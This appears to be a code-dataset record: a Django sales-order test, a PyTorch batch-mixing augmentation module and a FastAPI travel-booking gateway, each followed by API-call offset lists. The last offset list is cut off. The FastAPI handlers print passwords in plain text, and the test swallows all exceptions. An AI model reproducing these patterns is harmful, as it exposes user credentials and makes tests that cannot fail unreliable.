from books.seeders import sales_order as so
import moment
import json
import unittest
import random
import datetime
import logging
logger = logging.getLogger(__name__)
class InventoryTestCase(TestCase):
def setUp(self):
self.trxNo = acc.getTrxNo("INV")
def test_so(self):
total_price = 0
total_cost = 0
try:
with transaction.atomic():
salesOrder = SaleOrder()
for x in range(2):
units = random.randint(1,10)
cat = so.getCatalogue(created_at=datetime.datetime.now())
stock = so.getStock(cat=cat, trxNo=self.trxNo, created_at=datetime.datetime.now())
salesOrder.addItem(cat=cat, units=units)
total_cost += units * stock.unit_cost
total_price += units * stock.cat.price
self.assertEqual(total_price, salesOrder.getTotalPrice())
self.assertTrue(salesOrder.saveWithTrxNo(self.trxNo))
self.assertEqual(total_cost, salesOrder.getTotalCost())
trx = sale.invoice(order=salesOrder, descr="Stationery")
self.assertTrue(sale.receipt(trxNo=self.trxNo, amt=salesOrder.getTotalPrice()))
except DatabaseError as e:
logger.error(e)
except Exception as e:
logger.error(e)
def tearDown(self):
pass
|
[
"books.controllers.accountant.getTrxNo",
"books.controllers.customer.Order",
"random.randint",
"datetime.datetime.now",
"books.controllers.sale.invoice",
"django.db.transaction.atomic",
"logging.getLogger"
] |
[((472, 499), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (489, 499), False, 'import logging\n'), ((569, 588), 'books.controllers.accountant.getTrxNo', 'acc.getTrxNo', (['"""INV"""'], {}), "('INV')\n", (581, 588), True, 'from books.controllers import accountant as acc\n'), ((661, 681), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (679, 681), False, 'from django.db import DatabaseError, transaction\n'), ((700, 711), 'books.controllers.customer.Order', 'SaleOrder', ([], {}), '()\n', (709, 711), True, 'from books.controllers.customer import Order as SaleOrder\n'), ((1247, 1297), 'books.controllers.sale.invoice', 'sale.invoice', ([], {'order': 'salesOrder', 'descr': '"""Stationery"""'}), "(order=salesOrder, descr='Stationery')\n", (1259, 1297), False, 'from books.controllers import sale\n'), ((748, 769), 'random.randint', 'random.randint', (['(1)', '(10)'], {}), '(1, 10)\n', (762, 769), False, 'import random\n'), ((807, 830), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (828, 830), False, 'import datetime\n'), ((895, 918), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (916, 918), False, 'import datetime\n')]
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .function import onehot, onehot_cross
class random_batch_generalization_abs(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
mag = mag.abs()
ctx.save_for_backward(x, ref_index, target_index, mag)
ret = x.clone()
ret_y = y.clone()
for i in range(len(ref_index)):
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
total = (mag[i].abs() + (1 - mag[i]).abs())
target_p = mag[i].abs() / total
ref_p = (1 - mag[i]).abs() / total
ret_y[target_index[i]] += y[ref_index[i]] * target_p
ret_y[ref_index[i]] = y[ref_index[i]] * ref_p
return ret, ret_y
@staticmethod
def backward(ctx, grad_output, _):
x, ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class random_batch_generalization(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
ctx.save_for_backward(x, ref_index, target_index, mag)
ret = x.clone()
ret_y = y.clone()
for i in range(len(ref_index)):
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
total = (mag[i].abs() + (1 - mag[i]).abs())
target_p = mag[i].abs() / total
ref_p = (1 - mag[i]).abs() / total
ret_y[target_index[i]] += y[ref_index[i]] * target_p
ret_y[ref_index[i]] = y[ref_index[i]] * ref_p
return ret, ret_y
@staticmethod
def backward(ctx, grad_output, _):
x, ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class RandomBatchGeneralization(nn.Module):
def __init__(self, rate=0.1, epsilon=0.4, abs_mag=False):
super().__init__()
self.epsilon = epsilon
self.rate = rate
if abs_mag:
self.forward_ = random_batch_generalization.apply
else:
self.forward_ = random_batch_generalization_abs.apply
def forward(self, x, y):
if self.training:
return self.forward_(x, y, self.rate, self.epsilon)
else:
return x, y
class batch_generalization(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.zeros(ref_index.shape, dtype=torch.int)
for i in range(len(ref_index)):
same_label = torch.where(y == y[ref_index[i]])[0]
j = torch.randint(low=0, high=len(same_label), size=(1,))
target_index[i] = same_label[j[0]]
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
ret = x.clone()
for i in range(len(ref_index)):
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
# ctx.save_for_backward(x, ref_index, target_index, mag)
ctx.save_for_backward(ref_index, target_index, mag)
return ret
@staticmethod
def backward(ctx, grad_output):
# x, ref_index, target_index, mag = ctx.saved_tensors
ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class BatchGeneralization(nn.Module):
def __init__(self, rate=0.1, epsilon=0.4):
super().__init__()
self.epsilon = epsilon
self.rate = rate
self.forward_ = batch_generalization.apply
def forward(self, x, y):
if self.training:
return self.forward_(x, y, self.rate, self.epsilon)
else:
return x
class GeneralizationDoNothing(nn.Module):
def __init__(self, rate=0.1, epsilon=0.4):
super().__init__()
def forward(self, x, y):
return x
if __name__ == '__main__':
import time
def profile(func, x, y):
start = time.perf_counter()
ret = func(x, y)
end = time.perf_counter()
print("{}, {} ms".format(str(func), (end - start) * 1000))
return ret
x = torch.rand((100, 3, 256, 256), requires_grad=True)
y = torch.randint(low=0, high=9, size=(100,))
r = RandomBatchGeneralization(rate=0.5)
ret_x, ret_y = profile(r, x, onehot(y, 10))
ret_x.sum().backward()
print(ret_y[:10])
print(ret_y.shape)
# profile(r.cuda(), x.cuda())
r = BatchGeneralization()
ret = profile(r, x, y)
ret.sum().backward()
output = torch.rand((100, 10), requires_grad=True)
loss = onehot_cross(output, onehot(y, 10))
print(loss)
loss.backward()
loss = torch.nn.functional.cross_entropy(output, y)
print(loss)
loss = onehot_cross(output, ret_y)
print(loss)
|
[
"torch.randint",
"torch.where",
"time.perf_counter",
"torch.nn.functional.cross_entropy",
"torch.rand",
"torch.zeros"
] |
[((6041, 6091), 'torch.rand', 'torch.rand', (['(100, 3, 256, 256)'], {'requires_grad': '(True)'}), '((100, 3, 256, 256), requires_grad=True)\n', (6051, 6091), False, 'import torch\n'), ((6100, 6141), 'torch.randint', 'torch.randint', ([], {'low': '(0)', 'high': '(9)', 'size': '(100,)'}), '(low=0, high=9, size=(100,))\n', (6113, 6141), False, 'import torch\n'), ((6438, 6479), 'torch.rand', 'torch.rand', (['(100, 10)'], {'requires_grad': '(True)'}), '((100, 10), requires_grad=True)\n', (6448, 6479), False, 'import torch\n'), ((6574, 6618), 'torch.nn.functional.cross_entropy', 'torch.nn.functional.cross_entropy', (['output', 'y'], {}), '(output, y)\n', (6607, 6618), False, 'import torch\n'), ((4033, 4078), 'torch.zeros', 'torch.zeros', (['ref_index.shape'], {'dtype': 'torch.int'}), '(ref_index.shape, dtype=torch.int)\n', (4044, 4078), False, 'import torch\n'), ((5867, 5886), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (5884, 5886), False, 'import time\n'), ((5926, 5945), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (5943, 5945), False, 'import time\n'), ((4144, 4177), 'torch.where', 'torch.where', (['(y == y[ref_index[i]])'], {}), '(y == y[ref_index[i]])\n', (4155, 4177), False, 'import torch\n')]
|
import asyncio
import sys
import time
import datetime
from queue import Queue
from threading import Thread
from typing import Optional
from fastapi import FastAPI, Form, HTTPException, Request
from fastapi.middleware.cors import CORSMiddleware
from sse_starlette.sse import EventSourceResponse
from google.protobuf import json_format
from hipotap_common.api.endpoints import (
GET_ORDER_PATH,
GET_TRENDS_PATH,
ORDER_PAYMENT_PATH,
ORDER_RESERVE_REQUEST_PATH,
ORDER_LIST_PATH,
ORDER_LISTEN_PATH,
OFFER_PATH,
OFFER_FILTERING_PATH,
OFFER_LISTEN_PATH
)
from hipotap_common.proto_messages.auth_pb2 import AuthStatus
from hipotap_common.proto_messages.customer_pb2 import CustomerCredentialsPB, CustomerPB
from hipotap_common.proto_messages.hipotap_pb2 import BaseStatus
from hipotap_common.proto_messages.order_pb2 import (
GetOrderRequestPB,
OrderPB,
OrderPaymentRequestPB,
OrderRequestPB,
OrderListRequestPB,
)
from hipotap_common.proto_messages.offer_pb2 import (
OfferFilterPB
)
from pydantic import BaseModel
from hipotap_common.rpc.clients.customer_rpc_client import CustomerRpcClient
from hipotap_common.rpc.clients.offer_rpc_client import OfferRpcClient
from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient
from hipotap_common.rpc.clients.events_fanout_client import EventFanoutClient
CUSTOMER_AUTH_QUEUE = "customer_auth"
class AuthData(BaseModel):
email: str
password: str
app = FastAPI()
origins = [
"http://localhost:17212",
"http://localhost:17213",
]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
time.sleep(5)
@app.post("/customer/authenticate/")
async def authenticate(email: str = Form(...), password: str = Form(...)):
print(f"Got [POST]/customer/authenticate/ with email={email}&password={password}")
sys.stdout.flush()
customer_credentials = CustomerCredentialsPB()
customer_credentials.email = email
customer_credentials.password = password
customer_client = CustomerRpcClient()
auth_response_pb = customer_client.authenticate(customer_credentials)
if auth_response_pb.status == AuthStatus.OK:
print("Authentication OK")
sys.stdout.flush()
return {
"name": auth_response_pb.customer_data.name,
"surname": auth_response_pb.customer_data.surname,
}
else:
raise HTTPException(status_code=401, detail="Invalid credentials")
@app.post("/customer/register/")
async def register(
name: str = Form(...),
surname: str = Form(...),
email: str = Form(...),
password: str = Form(...),
):
print(
f"Got [POST]/customer/register/ with name={name}, surname={surname}, email={email}, password={password}"
)
sys.stdout.flush()
customer_client = CustomerRpcClient()
customer_pb = CustomerPB()
customer_pb.data.name = name
customer_pb.data.surname = surname
customer_pb.credentials.email = email
customer_pb.credentials.password = password
reg_response = customer_client.register(customer_pb)
if reg_response.status == BaseStatus.OK:
print("Registration OK")
sys.stdout.flush()
return {"status": "OK"}
else:
raise HTTPException(status_code=401, detail="Email is taken")
@app.get("/offers/")
async def offers():
print(f"Got [GET]/offers/", flush=True)
offer_client = OfferRpcClient()
offer_list_pb = offer_client.get_offers()
return json_format.MessageToDict(
offer_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(OFFER_PATH + "{offer_id}")
async def offers(offer_id: int):
print(f"Got [GET]/offer/{offer_id}", flush=True)
offer_client = OfferRpcClient()
offer_pb = offer_client.get_offer(offer_id)
return json_format.MessageToDict(
offer_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(OFFER_FILTERING_PATH)
async def offers_filtered(
allowed_adult_count: Optional[int] = Form(None),
allowed_children_count: Optional[int] = Form(None),
max_adult_price: Optional[float] = Form(None),
max_children_price: Optional[float] = Form(None),
hotel: Optional[str] = Form(None),
place: Optional[str] = Form(None),
date_start: Optional[str] = Form(None),
date_end: Optional[str] = Form(None)
):
print(f"Got [GET]/offer/filter/ with "
f"allowed_adult_count={allowed_adult_count}, "
f"allowed_children_count={allowed_children_count}, "
f"max_adult_price={max_adult_price}, "
f"max_children_price = {max_children_price}, "
f"hotel={hotel}, "
f"place={place}, "
f"date_start={date_start}, "
f"date_end={date_end}", flush=True)
offer_client = OfferRpcClient()
offer_filter_pb = OfferFilterPB()
offer_filter_pb.use_allowed_adult_count = allowed_adult_count is not None
offer_filter_pb.use_allowed_children_count = allowed_children_count is not None
offer_filter_pb.use_max_adult_price = max_adult_price is not None
offer_filter_pb.use_max_children_price = max_children_price is not None
offer_filter_pb.use_place = place is not None
offer_filter_pb.use_hotel = hotel is not None
offer_filter_pb.use_date_start = date_start is not None
offer_filter_pb.use_date_end = date_end is not None
if offer_filter_pb.use_allowed_adult_count:
offer_filter_pb.allowed_adult_count = allowed_adult_count
if offer_filter_pb.use_allowed_children_count:
offer_filter_pb.allowed_children_count = allowed_children_count
if offer_filter_pb.use_max_adult_price:
offer_filter_pb.max_adult_price = max_adult_price
if offer_filter_pb.use_max_children_price:
offer_filter_pb.max_children_price = max_children_price
if offer_filter_pb.use_place:
offer_filter_pb.place = place
if offer_filter_pb.use_hotel:
offer_filter_pb.hotel = hotel
if offer_filter_pb.use_date_start:
offer_filter_pb.date_start.FromDatetime(datetime.datetime.strptime(date_start, "%Y-%m-%d"))
if offer_filter_pb.use_date_end:
offer_filter_pb.date_end.FromDatetime(datetime.datetime.strptime(date_end, "%Y-%m-%d"))
offer_list_pb = offer_client.get_offers_filtered(offer_filter_pb)
return json_format.MessageToDict(
offer_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.post(ORDER_RESERVE_REQUEST_PATH)
async def order_reserve_request(
offer_id: int = Form(...),
customer_email: str = Form(...),
adult_count: int = Form(...),
children_count: int = Form(...),
):
order_client = OrderRpcClient()
order_request_pb = OrderRequestPB()
order_request_pb.offer_id = offer_id
order_request_pb.customer_email = customer_email
order_request_pb.adult_count = adult_count
order_request_pb.children_count = children_count
order_response = order_client.order_reserve_request(order_request_pb)
if order_response.status == BaseStatus.OK:
print("Order OK", flush=True)
order_pb = OrderPB()
order_response.message.Unpack(order_pb)
return json_format.MessageToDict(
order_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
else:
raise HTTPException(status_code=401, detail="Cannot order offer")
@app.get(ORDER_LIST_PATH)
async def order_list_request(customer_email: str = Form(...)):
order_client = OrderRpcClient()
order_list_request_pb = OrderListRequestPB()
order_list_request_pb.customer_email = customer_email
order_list_pb = order_client.get_order_list(order_list_request_pb)
return json_format.MessageToDict(
order_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(GET_ORDER_PATH)
async def get_order_request(order_id: int = Form(...)):
order_client = OrderRpcClient()
get_order_request_PB = GetOrderRequestPB()
get_order_request_PB.order_id = order_id
order_pb = order_client.get_order(get_order_request_PB)
return json_format.MessageToDict(
order_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.post(ORDER_PAYMENT_PATH)
async def order_payment_request(
order_id: int = Form(...),
card_number: str = Form(...),
price: float = Form(...),
):
order_client = OrderRpcClient()
order_paymet_request_pb = OrderPaymentRequestPB()
order_paymet_request_pb.order_id = order_id
order_paymet_request_pb.payment_info.card_number = card_number
order_paymet_request_pb.payment_info.price = price
payment_response = order_client.order_payment_request(order_paymet_request_pb)
if payment_response.status == BaseStatus.OK:
print("Payment OK", flush=True)
return {"status": "OK"}
else:
raise HTTPException(status_code=401, detail="Cannot pay order")
MESSAGE_STREAM_RETRY_TIMEOUT = 15000 # milisecond - change also in events_fanout_client (bad code)
MESSAGE_STREAM_DELAY = 1 # second (or maybe this one should be in events_fanout_client) (very bad code)
def event_receiving(event_queue: Queue, event_type):
print("THREAD START", flush=True)
event_fanout_client = EventFanoutClient(event_queue, event_type)
event_fanout_client.start_consuming()
print("THREAD EXIT", flush=True)
@app.get(OFFER_LISTEN_PATH + "{offer_id}")
async def get_offer_events(offer_id: int, request: Request):
#event_client = EventRpcClient()
#new_offer_PB =
print(f"GOT /offer/listen/{offer_id}")
async def event_generator(request: Request):
event_queue = Queue()
event_receiver_thread = Thread(target=event_receiving, args=(event_queue, "offer", ))
print("THREAD CREATED", flush=True)
event_receiver_thread.start()
try:
while True:
if await request.is_disconnected():
break
while not event_queue.empty():
# todo: process message
print("EVENT", flush=True)
yield {
"event": "message",
"id": "message_id",
"retry": MESSAGE_STREAM_RETRY_TIMEOUT,
"data": event_queue.get()
}
else:
print(f"No events in a queue", flush=True)
await asyncio.sleep(MESSAGE_STREAM_DELAY)
except asyncio.CancelledError as e:
print(f"Disconnected client - {request.client}", flush=True)
finally:
print(f"Finally", flush=True)
return EventSourceResponse(event_generator(request))
@app.get(ORDER_LISTEN_PATH + "{order_id}")
async def get_order_events(order_id: int, request: Request):
#event_client = EventRpcClient()
#new_offer_PB =
print(f"GOT /order/listen/{order_id}")
async def event_generator(request: Request):
event_queue = Queue()
event_receiver_thread = Thread(target=event_receiving, args=(event_queue, "order", ))
print("THREAD CREATED", flush=True)
event_receiver_thread.start()
try:
while True:
if await request.is_disconnected():
break
while not event_queue.empty():
# todo: process message
print("EVENT", flush=True)
yield {
"event": "message",
"id": "message_id",
"retry": MESSAGE_STREAM_RETRY_TIMEOUT,
"data": event_queue.get()
}
else:
print(f"No events in a queue", flush=True)
await asyncio.sleep(MESSAGE_STREAM_DELAY)
except asyncio.CancelledError as e:
print(f"Disconnected client - {request.client}", flush=True)
finally:
print(f"Finally", flush=True)
return EventSourceResponse(event_generator(request))
@app.get(GET_TRENDS_PATH)
async def get_trends_request():
orders_client = OrderRpcClient()
trends_pb = orders_client.get_trends_request()
return json_format.MessageToDict(
trends_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
|
[
"hipotap_common.rpc.clients.offer_rpc_client.OfferRpcClient",
"sys.stdout.flush",
"google.protobuf.json_format.MessageToDict",
"hipotap_common.proto_messages.order_pb2.OrderPaymentRequestPB",
"hipotap_common.proto_messages.offer_pb2.OfferFilterPB",
"hipotap_common.proto_messages.order_pb2.OrderRequestPB",
"hipotap_common.proto_messages.order_pb2.OrderPB",
"hipotap_common.rpc.clients.customer_rpc_client.CustomerRpcClient",
"hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient",
"fastapi.FastAPI",
"threading.Thread",
"hipotap_common.proto_messages.customer_pb2.CustomerCredentialsPB",
"asyncio.sleep",
"fastapi.Form",
"time.sleep",
"datetime.datetime.strptime",
"queue.Queue",
"hipotap_common.proto_messages.order_pb2.GetOrderRequestPB",
"fastapi.HTTPException",
"hipotap_common.rpc.clients.events_fanout_client.EventFanoutClient",
"hipotap_common.proto_messages.customer_pb2.CustomerPB",
"hipotap_common.proto_messages.order_pb2.OrderListRequestPB"
] |
[((1476, 1485), 'fastapi.FastAPI', 'FastAPI', ([], {}), '()\n', (1483, 1485), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((1710, 1723), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1720, 1723), False, 'import time\n'), ((1799, 1808), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (1803, 1808), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((1826, 1835), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (1830, 1835), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((1929, 1947), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1945, 1947), False, 'import sys\n'), ((1976, 1999), 'hipotap_common.proto_messages.customer_pb2.CustomerCredentialsPB', 'CustomerCredentialsPB', ([], {}), '()\n', (1997, 1999), False, 'from hipotap_common.proto_messages.customer_pb2 import CustomerCredentialsPB, CustomerPB\n'), ((2107, 2126), 'hipotap_common.rpc.clients.customer_rpc_client.CustomerRpcClient', 'CustomerRpcClient', ([], {}), '()\n', (2124, 2126), False, 'from hipotap_common.rpc.clients.customer_rpc_client import CustomerRpcClient\n'), ((2616, 2625), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (2620, 2625), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((2646, 2655), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (2650, 2655), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((2674, 2683), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (2678, 2683), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((2705, 2714), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (2709, 2714), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((2853, 2871), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2869, 2871), False, 'import sys\n'), ((2895, 2914), 'hipotap_common.rpc.clients.customer_rpc_client.CustomerRpcClient', 'CustomerRpcClient', ([], {}), '()\n', (2912, 2914), False, 'from hipotap_common.rpc.clients.customer_rpc_client import CustomerRpcClient\n'), ((2933, 2945), 'hipotap_common.proto_messages.customer_pb2.CustomerPB', 'CustomerPB', ([], {}), '()\n', (2943, 2945), False, 'from hipotap_common.proto_messages.customer_pb2 import CustomerCredentialsPB, CustomerPB\n'), ((3490, 3506), 'hipotap_common.rpc.clients.offer_rpc_client.OfferRpcClient', 'OfferRpcClient', ([], {}), '()\n', (3504, 3506), False, 'from hipotap_common.rpc.clients.offer_rpc_client import OfferRpcClient\n'), ((3565, 3680), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['offer_list_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(offer_list_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (3590, 3680), False, 'from google.protobuf import json_format\n'), ((3852, 3868), 'hipotap_common.rpc.clients.offer_rpc_client.OfferRpcClient', 'OfferRpcClient', ([], {}), '()\n', (3866, 3868), False, 'from hipotap_common.rpc.clients.offer_rpc_client import OfferRpcClient\n'), ((3929, 4039), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['offer_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(offer_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (3954, 4039), False, 'from google.protobuf import json_format\n'), ((4168, 4178), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4172, 4178), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4224, 4234), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4228, 4234), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4275, 4285), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4279, 4285), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4329, 4339), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4333, 4339), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4368, 4378), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4372, 4378), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4407, 4417), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4411, 4417), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4451, 4461), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4455, 4461), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4493, 4503), 'fastapi.Form', 'Form', (['None'], {}), '(None)\n', (4497, 4503), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((4939, 4955), 'hipotap_common.rpc.clients.offer_rpc_client.OfferRpcClient', 'OfferRpcClient', ([], {}), '()\n', (4953, 4955), False, 'from hipotap_common.rpc.clients.offer_rpc_client import OfferRpcClient\n'), ((4978, 4993), 'hipotap_common.proto_messages.offer_pb2.OfferFilterPB', 'OfferFilterPB', ([], {}), '()\n', (4991, 4993), False, 'from hipotap_common.proto_messages.offer_pb2 import OfferFilterPB\n'), ((6467, 6582), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['offer_list_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(offer_list_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (6492, 6582), False, 'from google.protobuf import json_format\n'), ((6703, 6712), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (6707, 6712), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((6740, 6749), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (6744, 6749), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((6774, 6783), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (6778, 6783), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((6811, 6820), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (6815, 6820), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((6845, 6861), 'hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient', 'OrderRpcClient', ([], {}), '()\n', (6859, 6861), False, 'from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient\n'), ((6885, 6901), 'hipotap_common.proto_messages.order_pb2.OrderRequestPB', 'OrderRequestPB', ([], {}), '()\n', (6899, 6901), False, 'from hipotap_common.proto_messages.order_pb2 import GetOrderRequestPB, OrderPB, OrderPaymentRequestPB, OrderRequestPB, OrderListRequestPB\n'), ((7665, 7674), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (7669, 7674), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((7697, 7713), 'hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient', 'OrderRpcClient', ([], {}), '()\n', (7711, 7713), False, 'from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient\n'), ((7742, 7762), 'hipotap_common.proto_messages.order_pb2.OrderListRequestPB', 'OrderListRequestPB', ([], {}), '()\n', (7760, 7762), False, 'from hipotap_common.proto_messages.order_pb2 import GetOrderRequestPB, OrderPB, OrderPaymentRequestPB, OrderRequestPB, OrderListRequestPB\n'), ((7903, 8018), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['order_list_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(order_list_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (7928, 8018), False, 'from google.protobuf import json_format\n'), ((8117, 8126), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (8121, 8126), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((8149, 8165), 'hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient', 'OrderRpcClient', ([], {}), '()\n', (8163, 8165), False, 'from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient\n'), ((8193, 8212), 'hipotap_common.proto_messages.order_pb2.GetOrderRequestPB', 'GetOrderRequestPB', ([], {}), '()\n', (8210, 8212), False, 'from hipotap_common.proto_messages.order_pb2 import GetOrderRequestPB, OrderPB, OrderPaymentRequestPB, OrderRequestPB, OrderListRequestPB\n'), ((8329, 8439), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['order_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(order_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (8354, 8439), False, 'from google.protobuf import json_format\n'), ((8552, 8561), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (8556, 8561), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((8586, 8595), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (8590, 8595), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((8616, 8625), 'fastapi.Form', 'Form', (['...'], {}), '(...)\n', (8620, 8625), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((8650, 8666), 'hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient', 'OrderRpcClient', ([], {}), '()\n', (8664, 8666), False, 'from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient\n'), ((8697, 8720), 'hipotap_common.proto_messages.order_pb2.OrderPaymentRequestPB', 'OrderPaymentRequestPB', ([], {}), '()\n', (8718, 8720), False, 'from hipotap_common.proto_messages.order_pb2 import GetOrderRequestPB, OrderPB, OrderPaymentRequestPB, OrderRequestPB, OrderListRequestPB\n'), ((9505, 9547), 'hipotap_common.rpc.clients.events_fanout_client.EventFanoutClient', 'EventFanoutClient', (['event_queue', 'event_type'], {}), '(event_queue, event_type)\n', (9522, 9547), False, 'from hipotap_common.rpc.clients.events_fanout_client import EventFanoutClient\n'), ((12399, 12415), 'hipotap_common.rpc.clients.order_rpc_client.OrderRpcClient', 'OrderRpcClient', ([], {}), '()\n', (12413, 12415), False, 'from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient\n'), ((12478, 12589), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['trends_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(trends_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (12503, 12589), False, 'from google.protobuf import json_format\n'), ((2294, 2312), 